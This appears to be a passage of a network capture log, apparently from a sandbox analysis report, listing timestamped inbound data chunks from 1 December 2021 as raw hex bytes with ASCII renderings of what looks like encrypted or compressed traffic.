b2 10 95 c4 3e 60 95 1a 9e 04 0c 95 89 b7 Data Ascii: .?/[%N!uJB.BZxk1eauh@p$WD'esTo=.+>yt^H->X-Q\`u?pp:8CT[HZ]fHDW7'kI@]c#V:yU'+s3I&9Yr &ypV%qnKUT>`
2021-12-01 18:26:22 UTC	210	IN	Data Raw: 26 e1 de 6d 05 ad 81 20 06 8e eb b5 50 4a db de cc e1 c2 37 a4 66 85 66 d7 62 4e 21 e7 e1 cc e0 1d 1d d0 c9 e5 4d 1b 8a ff 49 7f 7d 24 3c bc a8 74 5e 9e 9e 5e 79 ad 0e 86 9f d8 51 60 2a 56 7a d2 01 ea 31 c0 ba 1b 63 d1 6a 0a a8 a1 2a c2 51 39 e9 ed d0 1f b3 bf d3 f9 03 b7 bf e0 04 ec 96 e3 28 f8 99 76 de fa 02 33 36 80 ea 5a f9 5f 2a 50 da 40 9c 0b 21 c0 db 3e c2 a2 54 25 70 f8 59 2d 2f e5 73 d7 a8 a6 89 f9 eb 9e 84 0e ce 6a c9 18 64 c0 de 4a a1 00 f1 23 5b bc 54 cd e1 b2 3d 4f b1 3e 65 8a ab 52 fc f0 56 aa ac 80 67 9e 1b 08 3b e5 83 c7 21 bc 76 93 3c 4a 65 2f f8 7a e4 61 a8 8c a5 3e 93 c5 e3 89 47 a1 ad cb d1 1f ac 01 50 17 73 38 d2 c6 46 de d2 35 8f 5c 1c c3 ec d8 c4 00 51 ba 49 71 61 59 b2 16 67 e8 31 13 b9 75 42 c9 7b 76 d4 e0 38 3d 09 6e c0 4d c0 b4 Data Ascii: &m PJ7ffbN!MI}$<t^^yQ`Vz1cjQ9(v36Z_*P@!>T%pY-/sjdJ#[T=O>eRVg;!v<Je/za>GPs8F5\QIqaYg1uB{v8=nM
2021-12-01 18:26:22 UTC	211	IN	Data Raw: 50 9d e4 0c b5 c7 55 3a 59 9f b5 0d 62 93 15 5e 97 2d 01 4a ff e0 fc 90 30 3a 85 ea 6a ee f2 84 dc 60 4a 8f f6 af 72 f7 67 e5 6a c7 b1 9c 21 31 3e f0 de 21 7d e3 d3 64 ea 24 de c5 99 01 7d 17 3c 8a fa 14 f8 cf 81 9c 7f 3e 46 7a 7f 87 d2 36 76 b0 f7 e4 bb 42 26 07 71 da f8 18 fa e7 b1 73 8a 7a 08 5d 9c 09 2f 49 4e ba 2c c1 49 4d 6a 04 a5 63 02 11 95 91 10 e2 80 21 51 48 fd 86 8e cf 1b 40 b8 32 25 d8 74 00 6b 04 e5 dc 07 82 d3 16 71 19 b5 de 55 8a 17 a7 b7 59 d3 c1 fa 31 0d 3b 4a f1 a8 cf 23 fb 94 d8 1b 1e c1 94 eb 18 f3 5c d7 22 94 e5 da 1c ba 78 53 4e 29 88 83 08 9f 24 08 2b 90 73 88 ae 24 1f 2c 75 d4 46 f4 88 4e c2 f0 5c da 73 b6 23 18 e8 aa 6c 12 6b 8a 48 bd 56 c5 58 e7 76 df af 98 67 30 1f 2f 14 ee 50 6e a0 29 30 4d 3c b3 39 67 ea 1e c8 05 b7 97 e5 39 Data Ascii: PU:Yb^-J0:j`Jrgj!1>!}d$}<>Fz6vB&qsz]/IN,IMjc!QH@2%tkqUY1;J#\"xSN)$+s$,uFN\s#lkHVXvg0/Pn)0M<9g9
2021-12-01 18:26:22 UTC	212	IN	Data Raw: e0 e9 dd 41 3b b3 74 ac 6c a0 1e fd 11 ff 60 92 36 90 e5 ed f0 66 76 58 f9 5f 6d 92 6e 4b 30 f0 de 3f fc 7f 13 9d a0 da 8f 7b e9 28 23 78 af 5f 1e 22 34 58 d7 26 bf 38 09 38 9f 93 02 8c 47 9c cd a8 85 83 fd 86 75 89 1c 4d 3d 20 12 01 8c 8a 43 e2 db 2b df 6c 9d 40 68 1a 30 da c4 52 a2 42 65 41 00 f3 c4 c7 28 f7 ef be 88 29 ef e4 d1 b6 5b 5a c2 0c 03 5c ad e2 7e 57 09 11 22 56 fa 2a 2f 6e 16 53 a8 a7 fb 3c 53 93 13 cd 6f 2e 4b 79 9f 87 25 de d3 7f bd 9d 5d 2a ee 73 77 01 2a 9e f7 fe 42 16 7f 5f d7 59 fe 6f e5 b4 06 27 25 aa 2a 49 31 ed 66 7e a7 53 26 ad 28 4f 4d d9 ed 91 56 b5 8d a7 0f 6a 6a 41 dd 22 2b 83 6a 6c a1 7d 9a c0 cb e8 bf 4c fc 17 49 91 cf d9 2b 00 89 56 eb bf 4f e0 31 e8 3d 77 54 a0 3f 07 92 1a eb 49 50 8d 24 ab b4 df ca c9 bc 9c dc ab 7e 36 3c Data Ascii: A;tl`6fvX_mnK0?{(#x_"4X&88GuM= C+l@h0RBeA()[Z\~W"V/nS<So.Ky%]swB_Yo'%I1f~S&(OMVjjA"+jl}LI+VO1=wT?IP$~6<
2021-12-01 18:26:22 UTC	213	IN	Data Raw: 77 38 f6 03 d2 ae f0 7e f4 ae bf d8 7c 14 d3 2f d2 00 d5 01 62 2c 80 a0 4d 6a 06 ad 77 2d 2c 06 56 58 6f cd c1 48 24 b5 86 f8 d5 49 0c 7f 4d 3c 19 63 00 d6 6d 54 9b 44 16 2b d1 9d cd 0d 14 a8 d9 c8 8d a4 c4 0a 27 a5 d1 84 7e 31 cf 25 b6 97 43 80 d8 81 9d 9c 38 9f b1 96 0c 2f 43 86 fa 50 17 60 6d 47 fc 16 2a 83 74 d8 ec 89 e3 e2 f0 c2 fb a9 f2 b8 82 29 b9 f5 1d 3a 6c e7 68 8f 73 5c 24 ac a5 27 67 37 1e 6d b7 2a e7 2f ba 6e 63 c8 51 d1 73 93 07 3c 66 28 64 31 7d 22 ad 41 b8 ee a5 e7 60 50 30 dc bd 8f 0f 33 74 65 06 5c 6c c6 25 68 c0 09 cb 98 f1 40 33 fe d7 cc a5 c1 c9 dc 7c 5f da b7 96 46 85 52 ce 4c 1b 7a 57 77 8a 81 30 e7 fb 61 01 ae fa f1 28 a6 9f 12 b3 d1 73 4f 79 12 c0 ab 69 07 a6 6b e2 40 c4 cd e0 bd e9 d6 cd 70 f0 9c 6e 4d ea 3b 33 1e 80 00 e3 47 1f Data Ascii: w8~\|/b,Mjw-,VXoH$IM<cmTD+'~1%C8/CP`mGt):lhs\$'g7m/ncQs<f(d1}"A`P03te\l%h@3\|_FRLzWw0a(sOyik@pnM;3G
2021-12-01 18:26:22 UTC	215	IN	Data Raw: 78 64 bc 80 7a 67 f3 c4 6e 43 ba 8d 19 21 93 93 4c 65 07 f8 38 df 61 a8 6f 5a 02 d2 c5 6e 89 ca 29 55 07 77 09 79 11 22 56 22 0f b3 e9 57 53 bf a0 14 a3 e3 18 98 79 30 70 10 00 fa 8b 88 5f b6 10 d7 75 e3 1f b8 24 42 8e 9f 9e f7 73 7d 8a 05 e1 28 86 4e 34 6e 4d 55 9f 65 80 48 b6 45 e5 16 72 2a d6 48 0c 50 f1 1d 06 51 f8 ae 51 aa a7 f0 94 e9 0a c8 36 5a 78 06 83 44 0b 52 83 36 4d 35 c2 b3 90 3d e5 f6 9c 23 50 be 9f b0 16 49 e0 8d 63 bd ac b4 e1 3f 01 54 72 03 7f d7 c8 47 a1 b0 d7 13 07 89 84 68 20 f6 c9 48 90 a0 3f e9 f1 55 f2 84 08 f0 1d 5b ca a0 07 58 86 48 b0 f5 f3 c5 5c cb 4e bd 31 1a 51 ef 9a c0 2c c2 6d 0d 1a c2 a8 07 79 26 9d 30 be 6c 3f 18 86 e8 2f 5b 80 1b df b3 44 87 c8 4e 6d 28 26 7a 98 d2 61 62 bb 8a 25 de 11 84 4f 80 bf ed 93 e7 85 df 52 4b c9 Data Ascii: xdzgnC!Le8aoZn)Uwy"V"WSy0p_u$Bs}(N4nMUeHEr*HPQQ6ZxDR6M5=#PIc?TrGh H?U[XH\N1Q,my&0l?/[DNm(&zab%ORK
2021-12-01 18:26:22 UTC	215	IN	Data Raw: fe fd ca 9f 31 d8 b3 15 cc 66 ea f4 cb 23 86 83 aa e0 b8 ff 61 a8 84 1a ba b8 b3 0c 84 29 1f a2 28 1b e2 19 3b f4 f9 8e c9 be b4 30 45 dd 58 8b dc cc c8 f0 5d 7e 88 86 44 12 38 da 04 76 f9 49 e4 b8 b1 55 7b b4 ff 0f 7c 45 fc 27 ca 03 69 9b 76 90 de 8e cc ff 0e f1 0f 55 a9 cb 1c 27 d2 a0 bb 3d 2d e2 bb 61 a9 f0 3e cb ad 01 68 f2 f7 0d 3b e5 85 4f 01 29 cb 6c 06 d6 7e a1 9b 61 1f 1e d3 a5 d1 de 12 41 2f 0c eb 41 53 34 81 6b b4 75 4a 14 73 df 85 38 40 d8 5e 19 62 26 a2 93 7b 95 b5 31 10 52 c8 0d c9 5f b4 5e db f5 1f 79 33 2d 21 55 c5 61 08 f8 ca a6 ea e2 28 84 c4 5c 76 90 aa 88 9c 6b 0c 92 c6 e5 6e 22 c2 db 8e af 28 3b 10 eb 7a c6 46 4f c5 4f 1e fd 9d 41 99 bb 1e e6 66 8f c9 5b 33 33 3d 5a 48 2f be f4 de 2c 42 17 2a b8 12 f3 c8 a8 c2 64 aa 7f 17 c3 59 e8 d7 Data Ascii: 1f#a)(;0EX]~D8vIU{\|E'ivU'=-a>h;O)l~aA/AS4kuJs8@^b&{1R_^y3-!Ua(\vkn"(;zFOOAf[33=ZH/,B*dY
2021-12-01 18:26:22 UTC	217	IN	Data Raw: f3 44 9f 4a 66 85 05 ca c5 c8 b2 22 de 9f 74 e7 a8 02 69 bb 36 6d 2f 72 f2 75 5d a9 fa dc 0d 45 d1 ef 66 d4 09 80 4f 4e d6 2c 20 8b 4d 6a 04 a5 57 02 12 82 91 10 e0 90 f1 32 3c 52 fa 9d 80 cc 8e c3 e2 20 97 35 ac 6e 67 23 04 44 62 58 d8 71 b0 bd de 55 54 0c 5c a0 46 8f 85 a5 a5 40 2b 29 04 81 6d 20 8f cc 0c 81 5b 61 38 9f 63 0f 6f a7 38 2f fa ae ae fd c0 4e 8b b1 88 83 fe af d7 d3 2a 35 4a da a1 2a 62 0c 9a af ab 5a 1d b0 1f 7a c1 59 d1 73 22 a8 a6 2f b5 6a d0 95 48 37 2b 67 ef 0e 6a c8 51 11 64 ea 6e 4e dc 53 2b f1 a0 4c 65 de 4a 11 25 c1 30 43 30 01 af 97 91 a2 db 72 85 ef 9f b4 4b 26 7f 29 cb a9 c8 30 cc 01 78 00 10 b8 20 ab 61 a4 ac 75 5a c1 c9 17 17 1a 94 2f 3f ba 0d f4 37 e7 fb 01 f1 34 5c ad 6e 35 b8 7a b3 48 e5 3f 0b 68 a1 32 3a ad 25 47 23 60 53 Data Ascii: DJf"ti6m/ru]EfON, MjW2<R 5ng#DbXqUT\F@+)m [a8co8/N5JbZzYs"/jH7+gjQdnNS+LeJ%0C0rK&)0x auZ/?74\n5zH?h2:%G#`S
2021-12-01 18:26:22 UTC	218	IN	Data Raw: 96 45 85 fd b2 05 85 99 8d b6 fa 66 80 1f 79 36 05 db 30 09 ad 72 83 e3 dc 24 f4 6e 6e e2 13 36 17 de e7 95 f4 de 72 ef 67 f3 74 57 e4 d1 dc be af 2e f3 16 74 23 75 81 6b 49 98 57 aa f6 43 98 ea c5 53 57 71 18 93 b4 c5 fb 86 7b 8f ef 31 8c 20 44 10 0f 50 7e 14 13 49 d2 28 99 88 6d aa a7 9b f3 89 7d 5f a3 41 fd 3f 38 61 d6 b6 c1 6d 0e 8a cd bf 2b 24 6a bc fe db db b2 9e 4d 16 87 84 4d 82 e3 79 59 2a bd 09 66 d7 84 26 54 ed 0c 90 3f b9 2e f1 e0 38 de fe ed 82 90 a8 2d f8 18 ff dc 0f 3d 47 59 0d a9 d2 6a 0b 8b 52 96 07 7c 06 fb ac 7a 78 80 fa cf f5 5e bd 01 92 44 85 1f 9f c8 ea 33 66 19 6b b6 86 b8 95 e8 78 a6 70 86 48 3b 14 47 3a 2a f7 79 4f f6 b3 10 66 19 44 46 c2 92 93 6d 29 e6 4f 18 91 15 30 be 06 b2 62 20 4d 5d ea 81 a3 07 a6 50 f6 0a 8a 1a 53 2f 91 bf Data Ascii: Efy60r$nn6rgtW.t#ukIWCSWq{1 DP~I(m}_A?8am+$jMMyYf&T?.8-=GYjR\|zx^D3fkxpH;G:yOfDFm)O0b M]PS/
2021-12-01 18:26:22 UTC	219	IN	Data Raw: 41 f0 1b 7c 33 e4 1c d1 f2 b8 05 04 ac d6 fb 4c d1 55 ed 7b 5d c7 60 e8 90 d4 09 cf d0 05 25 eb ba 7b e8 eb 3a 53 1c 74 2f 0c e5 91 79 14 aa bf a9 11 75 a5 5a f8 a4 88 b0 6b 7b 0d 9e 73 70 2a 2c 8d ba 26 d3 0b 7a 3f 35 9e 98 ec e5 76 3f e3 99 bf a1 50 c3 99 ab 2b 35 18 9f f3 56 4a 63 89 13 73 84 74 a8 fa ef 6d 2f 8b ca 0e dd 68 8c e7 e4 34 28 cb f0 21 fe 39 16 9b b5 2f ce ac 66 04 80 75 b9 1e 6e 14 3c bf 03 c7 85 57 b3 5d c1 30 3a 48 30 c9 ae ae c1 28 a6 44 a2 ff 84 2e a7 0d fe e7 a9 1d b4 01 9f 06 84 39 32 1e 42 9d 0d 06 70 39 60 a7 5a 86 07 33 f4 c8 c9 32 06 94 d5 0e 41 4d 9f 68 eb 6a 55 ce b3 e6 c2 5b 9d b0 2f cb c8 52 d9 62 48 46 c7 63 36 ee ec 72 3e 67 7d 86 bd 70 00 a7 7e 76 de 6d d8 ba cd 24 d0 42 a7 c7 bf b7 79 c6 72 1e 2f e7 3a a2 84 17 64 b9 d5 Data Ascii: A\|3LU{]`%{:St/yuZk{sp*,&z?5v?P+5VJcstm/h4(!9/fun<W]0:H0(D.92Bp9`Z32AMhjU[/RbHFc6r>g}p~vm$Byr/:d
2021-12-01 18:26:22 UTC	221	IN	Data Raw: f3 b9 51 91 98 b5 36 fa a0 d2 d3 43 44 a6 a6 ac 28 e7 df 25 91 b2 de 3b e9 fe a0 bf 5f 91 5d f9 66 f2 b2 b8 d7 21 e2 70 99 c8 62 80 24 50 60 e0 9d 35 07 de aa 52 95 fb 8e 47 ff e0 ae 42 27 5b 4c 1b fa 4a 7e 74 fd c0 fb e4 bc 99 a1 be 5e e8 aa 9c 8c ba b4 6f 82 05 55 28 5c 83 50 dc 9b df c3 ac ed fd cb b9 c5 00 92 4a 44 57 e1 39 af 5e 52 18 79 a4 91 de 4c b1 2b 36 38 7a 7e 18 9b 9f 9e 7f ed 0e 5b 41 66 19 ac 5c 80 92 1a 7a f2 13 07 e0 a5 15 bd 3b 6c 42 62 a9 4a ba a4 89 a3 cc e6 af 09 02 3b 56 35 43 7a 9b de 04 80 1c 85 25 7e ca aa c2 da 76 2f c2 63 10 20 97 99 a8 63 63 c5 78 3b 17 4b 74 1a ee e2 f6 9a 37 84 3c 13 50 7d fb e0 50 31 9b ae f1 d3 65 1c bd d6 67 8e 64 97 8e 89 b8 93 c3 5c 02 06 a9 20 c1 a6 41 f1 68 87 67 ed c3 20 3a fd 83 4d f7 26 9b 7b d2 07 Data Ascii: Q6CD(%;_]f!pb$P`5RGB'[LJ~t^oU(\PJDW9^RyL+68z~[Af\z;lBbJ;V5Cz%~v/c ccx;Kt7<P}P1egd\ Ahg :M&{
2021-12-01 18:26:22 UTC	222	IN	Data Raw: ed db e1 3d c3 64 9e ea e2 b9 9e c8 76 27 40 cd ea e2 da 1b ae 65 90 8c 12 0a a3 fd 0c 2d cb f0 54 6e 59 2e 80 33 d0 ce 34 d2 51 e1 25 63 05 19 f7 c1 d2 1e 79 7a ba ff b9 83 03 48 43 42 76 73 69 dd 96 59 eb f9 e0 5f e4 c4 33 cc 47 08 cb 3a 21 af bb 9b 40 9c b7 ea 83 28 29 02 1d 8c 06 f3 15 3c 45 76 5c 8e b7 37 e4 19 42 ee 8d f2 1b 88 11 2f 9e 3e aa 6d 2a 7d 28 2c 35 c8 e9 c3 b9 71 fa d1 b7 c9 9a 5c 1f 75 53 74 5d 0e 41 64 3f 5b 1a ca da d8 bb 15 6c d7 98 b8 1c ba 03 af ee 8d 64 87 82 a0 1c 91 8e 5a dc c5 6d f7 d3 b3 c0 96 db 61 c1 65 1d a7 9d e8 0d 0d c7 53 21 9b 35 1c 6b 1c 69 82 e4 ba 96 66 10 66 da a8 e2 cb ef 38 75 20 1a ee 70 d8 c7 ce fb f1 7e c7 61 c5 ca 5e 5e ed 86 94 d5 9d f4 33 f2 c5 24 5f 93 76 e1 d7 20 99 24 a9 c9 6f c8 47 0e b3 bd 06 30 9d 1d Data Ascii: =dv'@e-TnY.34Q%cyzHCBvsiY_3G:!@()<Ev\7B/>m*}(,5q\uSt]Ad?[ldZmaeS!5kiff8u p~a^^3$_v $oG0
2021-12-01 18:26:22 UTC	223	IN	Data Raw: 01 18 99 5d b6 15 76 db 73 7a 3b 19 a8 d9 3f 62 11 c5 09 48 ea 7e 3a 81 39 7a 1f 03 19 79 e1 c0 2f 0d be b7 c3 bc b2 3b bb 4c 19 27 7d 44 56 a4 44 16 69 05 2c 49 b5 60 f2 ab 2c ad f0 a5 15 bd f8 44 75 d8 8a 18 d0 a4 d9 c2 65 42 63 3f 04 0b aa 8f 30 7c 90 26 00 58 e8 25 57 c4 6a 12 40 8a 1c 2c f1 d7 81 07 41 df 45 96 22 35 0c b1 8d c0 ea 1a f6 24 f6 9a de 40 bb 66 58 38 ff 4f 22 1e 67 ad 2c 69 a3 b3 fe 9d 7e cc 0e 24 1c 76 9e af 88 0f b2 1c 60 67 05 d3 19 85 91 2b 15 bc c3 1d 38 fe c1 b2 7d 36 9e 3f c7 63 2d d4 11 4a 3f 1d fd 3c 4e 3c db 26 09 80 6e 6b 0d c7 f2 54 83 b3 f8 6c f9 be e7 d3 ee 66 ad 92 3d 71 c6 77 80 df 89 7b 61 2e 31 20 9b 82 26 b1 c4 80 81 77 c1 f3 c3 cf 37 02 f2 9d 13 74 1f 7b 7d ad aa da 0d bd d1 e3 92 d4 09 5b 87 df 3d 9a db 37 71 fe 79 Data Ascii: ]vsz;?bH~:9zy/;L'}DVDi,I`,DueBc?0\|&X%Wj@,AE"5$@fX8O"g,i~$v`g+8}6?c-J?<N<&nkTlf=qw{a.1 &w7t{}[=7qy
2021-12-01 18:26:22 UTC	224	IN	Data Raw: 25 d6 c7 e9 29 4a 70 39 60 8f 5a a1 3a 33 f4 2d 3d 86 6f 7c 7d 11 9a 82 fc 99 a3 8d 27 d2 1a ba 8e 6f bd 7a 46 62 df 4f c7 b9 9b 25 e5 d2 d5 9c 0a 9a 66 27 7d 0e f1 6c ee b0 f1 5a 4b 93 aa 89 8d 6c 68 3a 92 e3 af 0f 52 e3 a9 fd af 85 fa 1c 7b 17 64 b9 ed 06 ec fb 39 1f 96 e2 b9 31 5b da 7c 72 0b f5 ae 83 af 27 8c 14 b2 1d 9e ea 91 93 59 0e b4 60 09 db 2d 27 be 2d 90 01 45 3f 13 7d fc 10 f0 92 5c 57 0b 24 d8 a5 f9 ac a5 f4 3f 08 40 d6 8d 0d b7 be 28 7c 48 be f0 d7 8e 61 de 12 a8 79 97 fc e8 e2 d5 b5 7b 49 63 05 f0 a0 f0 5d f4 77 87 99 11 38 da de 2a 10 6d 82 e0 33 18 19 e2 74 83 d4 61 67 37 47 2f ed 0c 67 1d 7a f9 95 17 72 4d 02 31 4c c5 38 1d 2a ad da b6 24 db 12 6f a4 d4 16 1b 32 74 68 1a 4a cc 4f fd 5f cf 21 65 ad 3c e1 8b 0c b7 f8 3d 40 9e 57 69 9d 92 Data Ascii: %)Jp9`Z:3-=o\|}'ozFbO%f'}lZKlh:R{d91[\|r'Y`-'-E?}\W$?@(\|Hay{Ic]w8m3tag7G/gzrM1L8$o2thJO_!e<=@Wi
2021-12-01 18:26:22 UTC	226	IN	Data Raw: 25 76 9e 51 7d e9 77 13 37 1d 33 cf 53 64 18 b8 8c 2d 8b 25 6b 2e 3d 6f 7c 2e b4 db a2 a7 e7 05 ee 7f 10 d8 82 9c 7d 0b a4 d7 f6 ce fd f1 a7 98 0b 59 9b eb 30 ef 59 7a 9e 46 2c 62 90 49 10 68 6b b0 aa fc fa f8 c0 98 44 b7 8d 87 fe 29 4c 47 8a 32 45 12 62 0e 1e da 91 3a 6b 77 3f bd c9 25 b1 31 d3 18 5e 23 b5 8c d1 9d a3 75 00 5b be 48 7f 16 cf 2c 37 9e ca ae d1 2f 4a 04 36 59 e7 52 da 0b 95 c5 67 b0 b0 ea 87 55 0c bf 81 56 a4 21 6c 87 f9 2d 73 55 7d 42 7d 3c ae c6 6b 59 23 7f a5 ce eb 43 b8 7f 01 59 b5 dc 80 fb 47 7d 22 04 e7 e4 80 c9 51 fb 22 86 8e c0 ce 04 93 09 80 e5 8f 8d 73 6f e1 2b d3 62 2c 25 6f af 34 25 ab d9 41 18 0b 0a db 7a d9 d6 0b 34 43 65 20 92 df ec 67 fd 69 5f 44 07 6f 6d a0 86 5a a7 38 02 08 e3 e9 ab 43 15 3a 5c 14 f3 f6 7d 85 06 18 8d 8e Data Ascii: %vQ}w73Sd-%k.=o\|.}Y0YzF,bIhkD)LG2Eb:kw?%1^#u[H,7/J6YRgUV!l-sU}B}<kY#CYG}"Q"so+b,%o4%Az4Ce gi_DomZ8C:\}
2021-12-01 18:26:22 UTC	227	IN	Data Raw: 11 84 fc ce 6b 5e 92 cc 7a 5d 58 d1 27 97 7c fd 7e 47 41 65 40 e0 bb 38 e4 15 b8 c1 0c 3a 60 27 51 6e 2e 33 aa a2 fd 50 7a 13 7c 28 b1 5d 58 e6 2b f4 a1 2e 55 15 55 81 5b 5a 00 62 54 f9 02 bb 10 0c 93 5f e1 21 ce 7e 98 95 5c 94 c8 f7 38 9a ec 7d 09 5f 19 8b 23 e7 ca b0 87 04 49 1d 31 9e 7d 26 84 aa cd 73 2d ed cb d7 60 12 9c 86 14 15 7f 3f 93 ee 09 6c 1e 1b 4b 21 32 8a 1e f1 57 3d 4c c4 ec a5 a3 f3 ed b6 ad cf bb bb 6d 0f 22 e3 a2 15 78 97 82 fc 51 e5 59 aa 36 41 89 6c 35 9e ab 8a f8 68 03 97 a8 91 39 49 c7 f9 1c 4d 03 d7 17 cc de be e2 d8 e1 00 24 3e ee 6a 25 93 dc 46 59 53 97 84 90 23 31 05 35 31 8d 08 a3 43 6d ac 8e 62 6d 86 ad 60 b8 44 2b 75 fc 19 db 90 7d 91 d7 1a 65 c4 2f 4d d6 9f d1 11 90 ad 0e 2e fd 2c e9 83 79 bc 86 e6 4a 04 6b 80 75 32 47 a0 db Data Ascii: k^z]X'\|~GAe@8:`'Qn.3Pz\|(]X+.UU[ZbT_!~\8}_#I1}&s-`?lK!2W=Lm"xQY6Al5h9IM$>j%FYS#151Cmbm`D+u}e/M.,yJku2G
2021-12-01 18:26:22 UTC	228	IN	Data Raw: d6 d0 e5 c3 85 25 88 c0 61 6f 69 a9 8e 36 34 a3 ae 72 6d d6 8a 92 43 39 e4 be cf a7 a6 be 52 9e c5 10 14 c2 fa e0 78 99 47 8a ef 89 ee 27 d6 df a6 7f 02 12 b2 03 19 89 ed 30 c3 63 aa fa 59 b5 f4 f8 a2 ba 45 ae 4c 0c eb fc 09 a5 36 fc b5 9b 0b 38 ec ce 46 2b da 61 c4 a1 82 d7 3a 9b 7e 32 80 c3 2c 89 a3 b3 f8 a0 2f d5 2d 05 07 b5 c8 0d ef bb 76 db e9 8c 51 ad 60 aa 52 76 7b 05 d4 52 37 be e9 48 d3 b1 61 63 92 56 79 71 5b 87 5e b4 fe ed a5 34 d6 30 bf 5d 48 e9 b2 ba 78 44 01 2e 04 3d 8b de e8 fd 4d ef 5d 2f e6 dc 87 e3 d0 fb 3c 64 96 59 fc 5f 28 d2 8c 2e f2 84 20 ef 0d 1a 62 8e 5f 48 df 98 bc 37 b8 ef 7b 83 10 7a 01 0a 5a fe 2b d1 73 48 79 fa 3e 37 0a 72 9b 33 59 ce ea 31 29 98 02 ef 71 13 2b 4f f4 4b d6 a2 ca db e7 7a b5 4a 87 33 d0 b2 c9 23 54 f0 6d b7 ba Data Ascii: %aoi64rmC9RxG'0cYEL68F+a:~2,/-vQ`Rv{R7HacVyq[^40]HxD.=M]/<dY_(. b_H7{zZ+sHy>7r3Y1)q+OKzJ3#Tm
2021-12-01 18:26:22 UTC	229	IN	Data Raw: ca 57 92 03 48 73 6a 88 91 3f 3b 4a 9b 8f f0 55 80 1e 15 8e 5a a4 ef e0 ab 41 15 20 e3 0a 1f d9 9d fe e4 3a 22 b8 f7 f1 aa 52 ce d4 1d b1 18 c2 ab 2e e3 af 66 c2 0e 4c f1 56 f3 7a 16 3f f2 5c 0e 3b e5 3d 8b ec 04 51 e5 39 27 13 36 65 60 4c 4f 58 60 a7 b4 d2 c5 e3 81 6b a3 ad cb 08 a5 49 98 6f aa fa e0 63 04 25 bb 57 71 72 a3 60 97 37 c8 fb 27 46 31 b7 f0 81 d4 4a a3 06 dd 5d 79 b8 af 08 86 cb 9d 36 9a c5 31 27 25 e8 7b c0 37 96 4c 21 70 ab 43 cb 4e cc 1a a3 d6 74 89 1a 50 d7 b0 1d 48 56 a0 42 e7 cc a7 f0 9c 66 9a c5 fd d1 87 ce 89 88 6b 25 3f b9 2e ca 7c 38 e5 56 f7 41 5b aa 1d f8 08 e1 64 92 52 0d 62 51 f8 01 95 68 03 9a 36 8a 2a 23 18 e8 ce f1 d7 9a 44 72 68 10 43 3d 9e 95 90 69 c3 a1 7a 9a ae ba 41 f1 94 18 2d 89 cd de 85 89 d2 7c b4 60 d9 0b 80 0c 35 Data Ascii: WHsj?;JUZA :"R.fLVz?\;=Q9'6e`LOX`kIoc%Wqr`7'F1J]y61'%{7L!pCNtPHVBfk%?.\|8VA[dRbQh6*#DrhC=izA-\|`5
2021-12-01 18:26:22 UTC	231	IN	Data Raw: 2e ca 1e 29 ca 72 ee 69 cd a2 ec 85 13 20 99 7d 47 cb 7b e4 a1 ea f5 c0 4a a5 e1 22 90 62 2c 9d 14 11 23 de 55 52 c4 0c b6 d3 24 41 94 21 88 7b 3e f7 de a9 1c 0b 04 e0 96 a0 3e f4 a0 db 12 d8 04 fc 19 c6 ae 5e c1 d7 44 eb c5 c2 50 74 a4 d7 6d 7e 47 df 24 75 6e 11 be 7e cf ec 2f 0e 1e c5 5c 7f dd db 63 f0 0e a6 b9 a4 6f 45 59 5f 42 df 98 bc ed 37 13 21 16 d2 ed d5 86 61 43 a0 3d f0 a4 b2 ed 91 ea ee 37 63 43 b3 88 ce 6a d1 e5 ce 62 0e cd 9c 14 fd 9b e5 ea 9e 7b cd f6 dd ea 0c 7e d8 ba 64 2e e7 e5 d1 23 52 4a 08 13 f3 96 fc e0 7e 3f 9e d6 67 32 cd 61 f5 c3 dd d8 d3 6b d4 c4 ed 66 77 b0 f4 1e 55 ba 1f bd d5 c5 dd f8 ac cd e1 bd 6a 2d 3e f8 be 13 c5 39 68 93 84 80 d5 9d 29 0a 60 d3 83 e6 9d 74 2c 6e 97 59 39 4b b3 63 af 01 6a c5 cc 36 ad 9c 20 c3 db ad 75 31 Data Ascii: .)ri }G{J"b,#UR$A!{>>^DPtm~G$un~/\coEY_B7!aC=7cCjb{~d.#RJ~?g2akfwUj->9h)`t,nY9Kcj6 u1
2021-12-01 18:26:22 UTC	231	IN	Data Raw: 64 14 76 76 0a 14 b9 6b e1 5d 60 e2 46 a2 30 77 4f 59 eb 25 a5 ae 02 75 a4 4a 6e fe 88 34 b4 99 bd 1e 54 bd 42 71 40 9f 66 52 99 3a df 30 82 4e 70 6e 96 52 14 f4 a0 c9 e5 41 33 d7 94 35 14 c0 4e 5f 3b 37 f2 68 b3 38 d4 27 b5 da b3 e1 fc 69 5d 44 cc 1d 8e c0 2a 15 14 03 19 65 b4 04 dd 4f da f8 ef ad cb 97 b4 a8 ab a8 36 f0 cd b4 b2 4f 46 a0 d4 ae 41 e7 c8 3a a3 67 92 e0 de 07 4f 3c b9 3e 7c 17 ab 84 bf cf 36 e3 ad b0 5e 15 4e 52 ad 78 c8 58 fa 1a 05 c9 72 fc 52 74 34 e5 79 db f1 80 a7 40 c7 4a 05 e1 3f 8a 04 d6 5d a0 2a ee 42 96 9d eb 6f 6b 5d 2f fa 77 b3 50 14 20 55 4e 9f fe 7d a4 d7 dc 37 e7 e8 50 0c 20 97 a8 38 7e b9 2d d7 8b 39 5a 29 57 45 d6 a3 ed 5f de ba 1c 52 7e 32 bd ab 9c 37 69 d8 35 17 1d 12 fc aa 4e dc 5b 39 6f a0 ce 75 56 c0 fe 4e 52 97 43 bb Data Ascii: dvvk]`F0wOY%uJn4TBq@fR:0NpnRA35N_;7h8'i]DeO6OFA:gO<>\|6^NRxXrRt4y@J?]Bok]/wP UN}7P 8~-9Z)WE_R~27i5N[9ouVNRC
2021-12-01 18:26:22 UTC	233	IN	Data Raw: 84 70 b8 2f 69 e8 60 c9 8e 0d 2f aa 7d 2d a0 9b 62 27 f4 d2 6d c9 6f 6e d9 dd 9a a3 58 7a a7 74 ff 46 f8 48 f0 de 3f fc 64 a9 db c7 31 88 48 5d 61 4d ba e8 9a 72 bc bd c5 42 9e 8e 31 47 15 dd 9b 08 90 42 e2 32 ea ea 0a 43 31 fa cf 04 39 ef 75 93 a6 24 fe 11 1d 9e e0 a9 e6 49 31 29 1a a7 84 28 e5 0e bd 52 be 9c 5c 1d 86 28 ca 12 69 77 9e 22 ee bb 48 2d f2 91 19 af 2c 13 34 0a 2f 51 a9 23 56 73 38 d9 7e fe e3 56 71 72 2e ad 97 fb 65 31 70 10 37 84 00 21 ff 3e 53 bf 10 13 71 50 bc c8 05 2b 1d 91 6b c7 9d dc 63 7d 84 21 37 82 6d 06 21 9a 5f 40 d0 8c 6e 4a 09 d5 29 0d d3 b2 48 1d 02 57 64 c5 a1 38 a7 